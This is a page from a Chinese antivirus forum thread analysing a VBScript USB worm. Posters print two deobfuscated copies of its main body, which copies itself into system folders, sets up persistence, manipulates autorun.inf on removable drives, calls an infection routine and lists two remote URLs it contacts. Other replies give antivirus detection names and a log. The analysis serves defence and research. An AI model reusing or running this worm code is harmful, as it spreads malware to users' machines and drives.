123
返回列表 发新帖
楼主: tiancun
收起左侧

[病毒样本] 卡巴不能删干净!郁闷中!MD5: A7E5BA

[复制链接]
SONGBOWEN
发表于 2007-11-6 22:34:04 | 显示全部楼层
再次解密的结果,同样未经检查……
  1. ver="7.2"
  2. filename="`"
  3. infname="`.url"
  4. timesname="`.lnk"
  5. tile="Gover"&ver
  6. fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"u7."&chr(54)&chr(54)&chr(48)&"0.or"&chr(103)&"/u72."&chr(97)&"s"&chr(112)
  7. fromurl2=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"u6."&chr(50)&chr(50)&chr(56)&"8.or"&chr(103)&"/u72."&chr(97)&"s"&chr(112)
  8. 'on error resume next
  9. dim wsh
  10. set wsh=createobject("wscript.shell")
  11. set fso=createobject("scripting.filesystemobject")
  12. set dir=fso.getspecialfolder(1)
  13. set win=fso.getspecialfolder(0)
  14. set dc=fso.drives
  15. ouwnname=wscript.scriptname
  16. exemulu=fso.getspecialfolder(2)&""
  17. wbem=fso.getspecialfolder(1)&"\wbem"
  18. mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
  19. if mulu=dir&"" then sys=true
  20. for each d in dc
  21. if mulu=d&"" then opendisk=wsh.run("explorer "&d,3,false)
  22. next
  23. if not sys then
  24. wscript.sleep 5000
  25. if jincheng("wscript.exe",2)=1 then
  26. if readtxt(dir&"\main.bin",1)= trim(date) then
  27. wscript.quit
  28. else
  29. buildfile dir&"\main.bin",date
  30. end if
  31. end if
  32. if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
  33. end if
  34. chengfa
  35. if sys then
  36. yincang
  37. if readtxt(mulu&infname,1)<>tile then
  38. buildinf 1,0,0,0,0,0
  39. end if
  40. if readtxt(win&""&infname,1)<>tile then
  41. buildinf 0,0,0,0,0,0
  42. end if
  43. lexe=readtxt(mulu&infname,5)
  44. if fso.fileexists(exemulu&lexe) then
  45. wsh.run exemulu&lexe
  46. end if
  47. if readtxt(dir&""&filename&".vbe",1)<>"'"&ver then
  48. copyvbs dir&""&filename&".vbe"
  49. zhuce
  50. end if
  51. if readtxt(win&""&filename&".vbe",1)<>"'"&ver then
  52. copyvbs win&""&filename&".vbe"
  53. end if
  54. if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
  55. buildfile wbem&filename&".vbe",ucc(O1+O2)
  56. end if
  57. if readtxt(mulu&infname,11)=2 then
  58. for each d in dc
  59. if d.drivetype=2 then
  60. if fso.fileexists(d&"/autorun.inf") then
  61. delfile d&"/autorun.inf"
  62. end if
  63. if not fso.folderexists(d&"/autorun.inf") then
  64. buildfold d&"/autorun.inf"
  65. shuxing d&"/autorun.inf",1+2+4
  66. end if
  67. end if
  68. next
  69. end if
  70. ganran
  71. wsh.run mulu&ouwnname
  72. else
  73. shuxing mulu&ouwnname,2+4
  74. copyvbs dir&""&filename&".vbe"
  75. copyvbs win&""&filename&".vbe"
  76. zhuce
  77. wsh.run dir&""&filename&".vbe"
  78. end if
复制代码
SONGBOWEN
发表于 2007-11-6 22:35:04 | 显示全部楼层
距离完全的解密就差一步了!
haol
发表于 2007-11-6 22:40:14 | 显示全部楼层
nod32 found VBS/Naiad.F
SONGBOWEN
发表于 2007-11-6 22:40:54 | 显示全部楼层
完整机密以后的程序主体代码,还有一部分的过程、函数没有解密出来,不过我想我就到此为止了,其余的我就不继续做了,否则容易造成该病毒或其变种大面积传播……
  1. Dim mfso,vf
  2. set mfso=createobject("scripting.filesystemobject")
  3. set vf=mfso.createtextfile("r7.log",true)
  4. 'vf.writeline

  5. ver="7.2"
  6. filename="`"
  7. infname="`.url"
  8. timesname="`.lnk"
  9. tile="Gover"&ver
  10. fromurl="http://u7.6600.org/u72.asp"
  11. fromurl2="http://u6.2288.org/u72.asp"

  12. 'on error resume next
  13. dim wsh
  14. set wsh=createobject("wscript.shell")
  15. set fso=createobject("scripting.filesystemobject")
  16. set dir=fso.getspecialfolder(1)
  17. set win=fso.getspecialfolder(0)
  18. set dc=fso.drives
  19. ouwnname=wscript.scriptname
  20. exemulu=fso.getspecialfolder(2)&""
  21. wbem=fso.getspecialfolder(1)&"\wbem"
  22. mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))

  23. if mulu=dir&"" then sys=true
  24. for each d in dc
  25. if mulu=d&"" then opendisk=wsh.run("explorer "&d,3,false)
  26. next
  27. if not sys then
  28. wscript.sleep 5000
  29. if jincheng("wscript.exe",2)=1 then
  30. if readtxt(dir&"\main.bin",1)= trim(date) then
  31. wscript.quit
  32. else
  33. buildfile dir&"\main.bin",date
  34. end if
  35. end if
  36. if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
  37. end if
  38. chengfa
  39. if sys then
  40. yincang
  41. if readtxt(mulu&infname,1)<>tile then
  42. buildinf 1,0,0,0,0,0
  43. end if
  44. if readtxt(win&""&infname,1)<>tile then
  45. buildinf 0,0,0,0,0,0
  46. end if
  47. lexe=readtxt(mulu&infname,5)
  48. if fso.fileexists(exemulu&lexe) then
  49. wsh.run exemulu&lexe
  50. end if
  51. if readtxt(dir&""&filename&".vbe",1)<>"'"&ver then
  52. copyvbs dir&""&filename&".vbe"
  53. zhuce
  54. end if
  55. if readtxt(win&""&filename&".vbe",1)<>"'"&ver then
  56. copyvbs win&""&filename&".vbe"
  57. end if
  58. if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
  59. buildfile wbem&filename&".vbe",ucc(O1+O2)
  60. end if
  61. if readtxt(mulu&infname,11)=2 then
  62. for each d in dc
  63. if d.drivetype=2 then
  64. if fso.fileexists(d&"/autorun.inf") then
  65. delfile d&"/autorun.inf"
  66. end if
  67. if not fso.folderexists(d&"/autorun.inf") then
  68. buildfold d&"/autorun.inf"
  69. shuxing d&"/autorun.inf",1+2+4
  70. end if
  71. end if
  72. next
  73. end if
  74. ganran
  75. wsh.run mulu&ouwnname
  76. else
  77. shuxing mulu&ouwnname,2+4
  78. copyvbs dir&""&filename&".vbe"
  79. copyvbs win&""&filename&".vbe"
  80. zhuce
  81. wsh.run dir&""&filename&".vbe"
  82. end if
复制代码
googlehack
发表于 2007-11-6 23:09:59 | 显示全部楼层
病毒名称很奇特。加密方法也很深啊!
SONGBOWEN
发表于 2007-11-6 23:13:47 | 显示全部楼层
原帖由 googlehack 于 2007-11-6 23:09 发表
病毒名称很奇特。加密方法也很深啊!

岂止很深……
我快郁闷了,不过还好,目前已经完整的恢复了病毒加密以前的原貌!
wangjun1984
发表于 2007-11-7 00:40:17 | 显示全部楼层
NOD32

2007-11-7 0:47:23        Real-time file system protection        file        C:\Documents and Settings\SM\桌面\样本\autorun.inf        INF/Autorun virus        deleted - quarantined        NT AUTHORITY\SYSTEM        Event occurred on a new file created by the application: C:\Program Files\WinRAR\WinRAR.exe.
xqiafl
发表于 2007-11-7 09:11:13 | 显示全部楼层
用U盘免疫,直接打开就行了.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-18 07:21 , Processed in 0.086460 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表